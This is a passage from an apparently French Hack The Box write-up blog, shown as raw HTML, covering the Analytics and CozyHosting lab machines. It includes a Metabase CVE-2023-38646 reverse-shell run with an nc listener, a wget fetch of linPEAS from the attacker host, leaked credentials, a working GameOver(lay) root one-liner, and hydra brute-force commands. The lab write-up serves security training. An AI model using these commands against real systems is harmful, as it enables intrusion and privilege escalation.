class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/…/HackTheBox/Machines/Analytics/CVE-2023-38646<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ python3 CVE-2023-38646-POC.py --ip data.analytical.htb </span></span><span class="line"><span class="cl">Failed to connect using HTTPS <span class="k">for</span> data.analytical.htb. Trying next protocol... </span></span><span class="line"><span class="cl">None. Vulnerable Metabase Instance:- </span></span><span class="line"><span class="cl"> IP: data.analytical.htb </span></span><span class="line"><span class="cl"> Setup Token: 249fa03d-fd94-4d5b-b94f-b4ebf3df681f </span></span></code></pre></td></tr></table> </div> </div><p>D&rsquo;après la CVE, si un setup Token est présent sur la page <strong>/api/session/properties</strong>, alors la machine est vulnérable.</p> <h3 id="metabase-exploit---reverse-shell">Metabase Exploit - Reverse Shell </h3><p>Grâce aux deuxième script, on a réussi à ouvrir shell :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/…/HackTheBox/Machines/Analytics/CVE-2023-38646<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ python3 CVE-2023-38646-Reverse-Shell.py --rhost data.analytical.htb --lhost 10.10.14.125 --lport <span class="m">44444</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>DEBUG<span class="o">]</span> Original rhost: data.analytical.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>DEBUG<span class="o">]</span> Preprocessed rhost: http://data.analytical.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>DEBUG<span class="o">]</span> Input Arguments - rhost: http://data.analytical.htb, lhost: 10.10.14.125, lport: <span class="m">44444</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>DEBUG<span class="o">]</span> Fetching setup token from http://data.analytical.htb/api/session/properties... </span></span><span class="line"><span class="cl"><span class="o">[</span>DEBUG<span class="o">]</span> Setup Token: 249fa03d-fd94-4d5b-b94f-b4ebf3df681f </span></span><span class="line"><span class="cl"><span class="o">[</span>DEBUG<span class="o">]</span> Version: v0.46.6 </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>Sur la kali, on a un deuxième terminal avec un nc ouvert :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/github/dirsearch<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lvp <span class="m">44444</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">44444</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.125<span class="o">]</span> from analytical.htb <span class="o">[</span>10.10.11.233<span class="o">]</span> <span class="m">53506</span> </span></span><span class="line"><span class="cl">bash: cannot <span class="nb">set</span> terminal process group <span class="o">(</span>1<span class="o">)</span>: Not a tty </span></span><span class="line"><span class="cl">bash: no job control in this shell </span></span><span class="line"><span class="cl">d7bb30f10313:/$ whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">metabase </span></span></code></pre></td></tr></table> </div> </div><h3 id="enumeration-linpeas">Enumeration (linPEAS) </h3><p>Pour faire un recherche plus poussé sur la machine avec le compte accessible, on va utilisé l&rsquo;outil <strong>linPEAS</strong>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># KALI: On télécharge linPEAS.sh depuis la page &#34;releases&#34; du dépôt github</span> </span></span><span class="line"><span class="cl">curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh &gt; linpeas.sh </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># KALI: On ouvre le port 80 à l&#39;aide de python sur la machine hôte</span> </span></span><span class="line"><span class="cl">sudo python3 -m http.server <span class="m">80</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># CIBLE: On récupère linPEAS.sh depuis la machine cible en se connectant sur le port 80 avec wget</span> </span></span><span class="line"><span class="cl">wget 10.10.14.125:80/linPEAS.sh </span></span></code></pre></td></tr></table> </div> </div><p>Après l&rsquo;execution de <strong>linPEAS</strong>, on a pu trouver un utilisateur et un mot de passe:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># $ env</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"><span class="nv">META_USER</span><span class="o">=</span>metalytics </span></span><span class="line"><span class="cl"><span class="nv">META_PASS</span><span class="o">=</span>An4lytics_ds20223# </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><h3 id="ssh-as-metalytics">SSH as metalytics </h3><p>On peut désormais se connecter en ssh avec le compte utilisateur trouvé:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/Hacking/HackTheBox/Machines/Analytics<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh metalytics@10.10.11.233 </span></span><span class="line"><span class="cl">metalytics@10.10.11.233<span class="err">&#39;</span>s password: </span></span><span class="line"><span class="cl">Welcome to Ubuntu 22.04.3 LTS <span class="o">(</span>GNU/Linux 6.2.0-25-generic x86_64<span class="o">)</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">Last login: Sat Dec <span class="m">30</span> 17:28:13 <span class="m">2023</span> from 10.10.14.99 </span></span><span class="line"><span class="cl">metalytics@analytics:~$ cat user.txt </span></span><span class="line"><span class="cl">8102.....9b97 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="gameoverlay-exploit--cve-202332629">GameOverlay Exploit : CVE-2023–32629 </h3><p>On a executé a nouveau un linPEAS sur la machine sans grand succès. Cependant, on a trouvé la version qui tourne sur la machine: <strong>Ubuntu 22.04.3</strong>.</p> <p>Après quelques recherches sur internet on a trouvé une faille exploitable dans cette version d&rsquo;ubuntu expliqué ici : <a class="link" href="https://medium.com/@0xrave/ubuntu-gameover-lay-local-privilege-escalation-cve-2023-32629-and-cve-2023-2640-7830f9ef204a" target="_blank" rel="noopener" >https://medium.com/@0xrave/ubuntu-gameover-lay-local-privilege-escalation-cve-2023-32629-and-cve-2023-2640-7830f9ef204a</a></p> <p>Il s&rsquo;agit de la <strong>CVE-2023–32629</strong>. Il y a 3 commandes a écrire sur la machine pour vérifier si elle est vulnérable:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">metalytics@analytics:~$ lsmod <span class="p">|</span> grep overlay </span></span><span class="line"><span class="cl">overlay <span class="m">188416</span> <span class="m">1</span> </span></span><span class="line"><span class="cl">metalytics@analytics:~$ modinfo overlay </span></span><span class="line"><span class="cl">filename: /lib/modules/6.2.0-25-generic/kernel/fs/overlayfs/overlay.ko </span></span><span class="line"><span class="cl">alias: fs-overlay </span></span><span class="line"><span class="cl">license: GPL </span></span><span class="line"><span class="cl">description: Overlay filesystem </span></span><span class="line"><span class="cl">author: Miklos Szeredi &lt;miklos@szeredi.hu&gt; </span></span><span class="line"><span class="cl">srcversion: 851BCABACE90D7C44199412 </span></span><span class="line"><span class="cl">depends: </span></span><span class="line"><span class="cl">retpoline: Y </span></span><span class="line"><span class="cl">intree: Y </span></span><span class="line"><span class="cl">name: overlay </span></span><span class="line"><span class="cl">vermagic: 6.2.0-25-generic SMP preempt mod_unload modversions </span></span><span class="line"><span class="cl">sig_id: PKCS#7 </span></span><span class="line"><span class="cl">signer: Build <span class="nb">time</span> autogenerated kernel key </span></span><span class="line"><span class="cl">sig_key: 03:91:76:66:F0:D5:23:99:A0:4F:17:5E:BD:A8:42:D6:08:A9:5F:71 </span></span><span class="line"><span class="cl">sig_hashalgo: sha512 </span></span><span class="line"><span class="cl">signature: 1E:49:B1:C3:CA:D2:84:15:17:4E:A5:AE:D6:E5:12:FD:D8:88:E3:C2: </span></span><span class="line"><span class="cl"> 7B:55:50:11:FB:96:54:0C:E5:E7:39:D8:0A:3A:5A:1B:E2:9B:4D:63: </span></span><span class="line"><span class="cl"> 70:8D:66:E1:72:15:90:BC:33:F2:7D:FA:B6:77:22:F1:7E:54:67:C8: </span></span><span class="line"><span class="cl"> 9F:13:B4:87:0D:3B:DE:97:BC:06:1A:83:2C:BF:41:23:B5:73:D1:09: </span></span><span class="line"><span class="cl"> E6:A8:FE:BD:A3:8C:7D:4C:C9:B6:30:91:24:64:BB:0E:93:7D:99:44: </span></span><span class="line"><span class="cl"> 2C:22:50:C8:75:9F:CC:67:54:65:AC:1C:CF:D5:87:A9:EC:71:9E:BF: </span></span><span class="line"><span class="cl"> C5:9E:C0:22:0E:2B:4F:9E:C9:69:B9:37:BA:B2:4F:7A:F2:A2:76:9C: </span></span><span class="line"><span class="cl"> D8:D6:7F:D0:8D:E8:64:D8:40:29:C1:E3:2C:9B:60:B9:35:A6:DA:E2: </span></span><span class="line"><span class="cl"> 4D:75:90:42:84:98:AE:2B:D4:3A:13:50:94:AD:72:72:B8:35:50:F4: </span></span><span class="line"><span class="cl"> 64:3C:23:BA:70:EC:D3:EE:05:03:0B:1E:61:01:42:65:2C:5D:44:75: </span></span><span class="line"><span class="cl"> CF:E1:62:47:41:02:7A:27:28:EB:F7:D9:02:AB:15:EB:1C:42:54:62: </span></span><span class="line"><span class="cl"> F0:2E:B0:FF:7D:AC:A0:FF:30:8F:24:E2:AD:43:7C:81:B8:F5:FB:25: </span></span><span class="line"><span class="cl"> D2:5A:71:53:45:99:BF:26:0E:40:D6:DD:3E:37:09:D8:7C:2E:9F:29: </span></span><span class="line"><span class="cl"> 33:86:CA:53:45:F2:3A:B8:E5:0B:D4:32:38:49:FB:C0:6B:06:19:83: </span></span><span class="line"><span class="cl"> 6F:FA:05:9D:6C:97:CB:0F:C4:10:EB:A3:76:53:B6:97:CC:EC:86:96: </span></span><span class="line"><span class="cl"> 01:8F:AB:EB:31:F2:CA:0B:0E:D0:E3:03:6B:3B:30:0B:83:07:74:04: </span></span><span class="line"><span class="cl"> 96:B7:E6:A2:B7:1D:7A:40:30:FC:F3:B0:E8:A4:F6:2F:5C:7F:F3:28: </span></span><span class="line"><span class="cl"> 9F:A6:9E:F1:40:ED:F1:21:0E:2E:0A:F0:AC:1D:96:28:8D:C0:A2:56: </span></span><span class="line"><span class="cl"> F6:F1:60:F9:2A:36:8C:0C:18:BE:C3:B5:C4:60:3A:53:66:F0:3B:BC: </span></span><span class="line"><span class="cl"> 92:D1:09:39:20:AB:FE:4B:68:24:A8:0A:0C:77:86:69:10:19:F9:70: </span></span><span class="line"><span class="cl"> 4F:A3:8A:49:BA:B8:71:27:AA:E9:02:28:09:54:82:34:69:0D:C8:EA: </span></span><span class="line"><span class="cl"> 0E:44:4A:54:32:D2:FC:E5:08:A1:31:1D:FE:BC:AD:06:75:0F:EF:DC: </span></span><span class="line"><span class="cl"> 47:6B:F6:BF:E0:E6:50:4E:51:F8:E6:B0:29:5B:7B:D7:D4:C6:1B:E6: </span></span><span class="line"><span class="cl"> C5:EA:30:01:C6:F9:C4:B1:28:89:C5:63:7C:5F:9D:CB:43:BB:87:7C: </span></span><span class="line"><span class="cl"> A7:DF:C7:4C:C3:8D:17:BD:61:EE:CA:D8:3B:32:81:2B:FA:D0:F6:70: </span></span><span class="line"><span class="cl"> 47:6C:ED:FA:FF:97:EF:4D:B3:C8:D3:E4 </span></span><span class="line"><span class="cl">parm: check_copy_up:Obsolete<span class="p">;</span> does nothing </span></span><span class="line"><span class="cl">parm: redirect_max:Maximum length of absolute redirect xattr value <span class="o">(</span>ushort<span class="o">)</span> </span></span><span class="line"><span class="cl">parm: redirect_dir:Default to on or off <span class="k">for</span> the redirect_dir feature <span class="o">(</span>bool<span class="o">)</span> </span></span><span class="line"><span class="cl">parm: redirect_always_follow:Follow redirects even <span class="k">if</span> redirect_dir feature is turned off <span class="o">(</span>bool<span class="o">)</span> </span></span><span class="line"><span class="cl">parm: index:Default to on or off <span class="k">for</span> the inodes index feature <span class="o">(</span>bool<span class="o">)</span> </span></span><span class="line"><span class="cl">parm: nfs_export:Default to on or off <span class="k">for</span> the NFS <span class="nb">export</span> feature <span class="o">(</span>bool<span class="o">)</span> </span></span><span class="line"><span class="cl">parm: xino_auto:Auto <span class="nb">enable</span> xino feature <span class="o">(</span>bool<span class="o">)</span> </span></span><span class="line"><span class="cl">parm: metacopy:Default to on or off <span class="k">for</span> the metadata only copy up feature <span class="o">(</span>bool<span class="o">)</span> </span></span><span class="line"><span class="cl">metalytics@analytics:~$ mount <span class="p">|</span> grep overlay </span></span><span class="line"><span class="cl">overlay on /var/lib/docker/overlay2/a7f6f5739f75f1e4bb96947354c287e8832cbd56e9413c7eb57975b922c7ae7c/merged <span class="nb">type</span> overlay <span class="o">(</span>rw,relatime,lowerdir<span class="o">=</span>/var/lib/docker/overlay2/l/BC2SP2TYPJ5O4YFC453ADZ5EKX:/var/lib/docker/overlay2/l/XW5JTCT2MPEXHQG7MOTAI2T4KP:/var/lib/docker/overlay2/l/NFDWLGW3V3JHKDMCSIVCIGFRMU:/var/lib/docker/overlay2/l/MW4MXSGOUKAHBMLEMZ4WR4K7P2:/var/lib/docker/overlay2/l/AT6LTLZWU4G7MV5NOTUEB7AR4N:/var/lib/docker/overlay2/l/E6VXP5EJLZW24GE2AHMELF7FTD:/var/lib/docker/overlay2/l/3BARVZES6SW2GPRYNNYXZNM63J:/var/lib/docker/overlay2/l/JMBR2L6LC7K3O6CZHA24AF2CYR:/var/lib/docker/overlay2/l/PMQWGTOJEKRSOK2OV65KQJBDQY:/var/lib/docker/overlay2/l/L7Y5QRKKSPELNF2AUJ55RR2MV5:/var/lib/docker/overlay2/l/RO73TCQC6F7YHICLAOSVCCNSQ6,upperdir<span class="o">=</span>/var/lib/docker/overlay2/a7f6f5739f75f1e4bb96947354c287e8832cbd56e9413c7eb57975b922c7ae7c/diff,workdir<span class="o">=</span>/var/lib/docker/overlay2/a7f6f5739f75f1e4bb96947354c287e8832cbd56e9413c7eb57975b922c7ae7c/work<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><p>On a pu en conclure que la machine était bien vulnérable et on a executé le payload expliqué dans l&rsquo;article.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">metalytics@analytics:~$ unshare -rm sh -c <span class="s2">&#34;mkdir l u w m &amp;&amp; cp /u*/b*/p*3 l/; </span></span></span><span class="line"><span class="cl"><span class="s2">setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m &amp;&amp; touch m/*;&#34;</span> <span class="o">&amp;&amp;</span> u/python3 -c <span class="s1">&#39;import os;os.setuid(0);os.system(&#34;/bin/bash&#34;)&#39;</span> </span></span><span class="line"><span class="cl">root@analytics:~# <span class="nb">cd</span> /root </span></span><span class="line"><span class="cl">root@analytics:/root# cat root.txt </span></span><span class="line"><span class="cl">f241.....692e </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/Sat, 30 Dec 2023 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="CozyHosting cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">CozyHosting</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.230</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ sudo nmap -sV -sC -A -n -p- 10.10.11.230 </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 4356bca7f2ec46ddc10f83304c2caaa8 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ <span class="m">256</span> 6f7a6c3fa68de27595d47b71ac4f7e42 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl">80/tcp open http nginx 1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Did not follow redirect to http://cozyhosting.htb </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: nginx/1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="etchosts--cozyhostinghtb">/etc/hosts : cozyhosting.htb </h3><p>Quand on tape l&rsquo;ip dans firefox, ca nous redirige directement vers le nom de domaine : <strong>cozyhosting.htb</strong></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## Dans /etc/hosts</span> </span></span><span class="line"><span class="cl"><span class="c1">## ...</span> </span></span><span class="line"><span class="cl">10.10.11.230 cozyhosting.htb </span></span></code></pre></td></tr></table> </div> </div><h3 id="hydra--port-80">hydra : port 80 </h3><p>Le brute force n&rsquo;a pas fonctionné&hellip;</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">sudo hydra -l info@cozyhosting.htb -P /usr/share/wordlists/rockyou.txt cozyhosting.htb http-post-form <span class="s2">&#34;/login:username=^USER^&amp;password=^PASS^:Invalid username or password&#34;</span> -I </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt cozyhosting.htb http-post-form <span class="s2">&#34;/login:username=^USER^&amp;password=^PASS^:Invalid username or password&#34;</span> -I </span></span></code></pre></td></tr></table> </div> </div><h3 id="dirbuster-gobuster-dirsearch">dirbuster, gobuster, dirsearch </h3><p>On a essayé de trouver un dossier à l&rsquo;aide de dirbuster, mais il n&rsquo;y avait rien de concluant.</p> <p>Cependant, avec l&rsquo;outil <strong>dirsearch</strong> (qui fait la meme chose que dirbuster et gobuster), on a pu voir qu&rsquo;un dossier <strong>actuator</strong> était accessible. C&rsquo;est parce que ce mot clée était présent dans la liste utilisé&amp; par défaut pas dirsearch qu&rsquo;on a pu trouver. Il aurait donc suffit de dirbuster/gobuster, ce mot n&rsquo;était jsute pas présent dans la liste que j&rsquo;utilisais. Voici le lien github pour dirsearch :<br> <a class="link" href="https://github.com/maurosoria/dirsearch" target="_blank" rel="noopener" >https://github.com/maurosoria/dirsearch</a></p> <p>Le dossier trouvé intéressant est <strong>actuator</strong>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/github/dirsearch<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ python3 dirsearch.py -u http://cozyhosting.htb </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> _<span class="p">|</span>. _ _ _ _ _ _<span class="p">|</span>_ v0.4.3 </span></span><span class="line"><span class="cl"> <span class="o">(</span>_<span class="o">||</span><span class="p">|</span> _<span class="o">)</span> <span class="o">(</span>/_<span class="o">(</span>_<span class="o">||</span> <span class="o">(</span>_<span class="p">|</span> <span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Extensions: php, aspx, jsp, html, js <span class="p">|</span> HTTP method: GET <span class="p">|</span> Threads: <span class="m">25</span> <span class="p">|</span> Wordlist size: <span class="m">11715</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Output: /home/kali/github/dirsearch/reports/http_cozyhosting.htb/_23-12-29_17-56-26.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Target: http://cozyhosting.htb/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>17:56:26<span class="o">]</span> Starting: </span></span><span class="line"><span class="cl"><span class="o">[</span>17:56:45<span class="o">]</span> <span class="m">200</span> - 0B - /<span class="p">;</span>/admin </span></span><span class="line"><span class="cl"><span class="o">[</span>17:56:45<span class="o">]</span> <span class="m">200</span> - 0B - /<span class="p">;</span>/json </span></span><span class="line"><span class="cl"><span class="o">[</span>17:56:45<span class="o">]</span> <span class="m">200</span> - 0B - /<span class="p">;</span>/login </span></span><span class="line"><span class="cl"><span class="o">[</span>17:56:45<span class="o">]</span> <span class="m">200</span> - 0B - /<span class="p">;</span>admin/ </span></span><span class="line"><span class="cl"><span class="o">[</span>17:56:45<span class="o">]</span> <span class="m">200</span> - 0B - /<span class="p">;</span>login/ </span></span><span class="line"><span class="cl"><span class="o">[</span>17:56:45<span class="o">]</span> <span class="m">400</span> - 435B - /<span class="se">\.</span>.<span class="se">\.</span>.<span class="se">\.</span>.<span class="se">\.</span>.<span class="se">\.</span>.<span class="se">\.</span>.<span class="se">\.</span>.<span class="se">\.</span>.<span class="se">\.</span>.<span class="se">\e</span>tc<span class="se">\p</span>asswd </span></span><span class="line"><span class="cl"><span class="o">[</span>17:56:45<span class="o">]</span> <span class="m">200</span> - 0B - /<span class="p">;</span>json/ </span></span><span class="line"><span class="cl"><span class="o">[</span>17:56:47<span class="o">]</span> <span class="m">400</span> - 435B - /a%5c.aspx </span></span><span class="line"><span class="cl"><span class="o">[</span>17:56:49<span class="o">]</span> <span class="m">200</span> - 0B - /actuator/<span class="p">;</span>/auditLog </span></span><span class="line"><span class="cl"><span class="o">[</span>17:56:49<span class="o">]</span> <span class="m">200</span> - 0B - /actuator/<span class="p">;</span>/beans </span></span><span class="line"><span class="cl"><span class="o">[</span>17:56:49<span class="o">]</span> <span class="m">200</span> - 634B - /actuator </span></span><span class="line"><span class="cl"><span class="o">[</span>17:56:49<span class="o">]</span> <span class="m">200</span> - 0B - /actuator/<span class="p">;</span>/auditevents </span></span><span class="line"><span class="cl"><span class="o">[</span>17:56:49<span class="o">]</span> <span class="m">200</span> - 0B - /actuator/<span class="p">;</span>/caches </span></span><span class="line"><span class="cl"><span class="o">[</span>17:56:49<span class="o">]</span> <span class="m">200</span> - 0B - /actuator/<span class="p">;</span>/conditions </span></span><span class="line"><span class="cl"><span class="o">[</span>17:56:49<span class="o">]</span> <span class="m">200</span> - 0B - /actuator/<span class="p">;</span>/configurationMetadata </span></span><span class="line"><span class="cl"><span class="o">[</span>17:56:49<span class="o">]</span> <span class="m">200</span> - 0B - /actuator/<span class="p">;</span>/exportRegisteredServices </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"><span class="o">[</span>17:57:38<span class="o">]</span> <span class="m">200</span> - 0B - /extjs/resources//charts.swf </span></span><span class="line"><span class="cl"><span class="o">[</span>17:57:45<span class="o">]</span> <span class="m">200</span> - 0B - /html/js/misc/swfupload//swfupload.swf </span></span><span class="line"><span class="cl"><span class="o">[</span>17:57:51<span class="o">]</span> <span class="m">200</span> - 0B - /jkstatus<span class="p">;</span> </span></span><span class="line"><span class="cl"><span 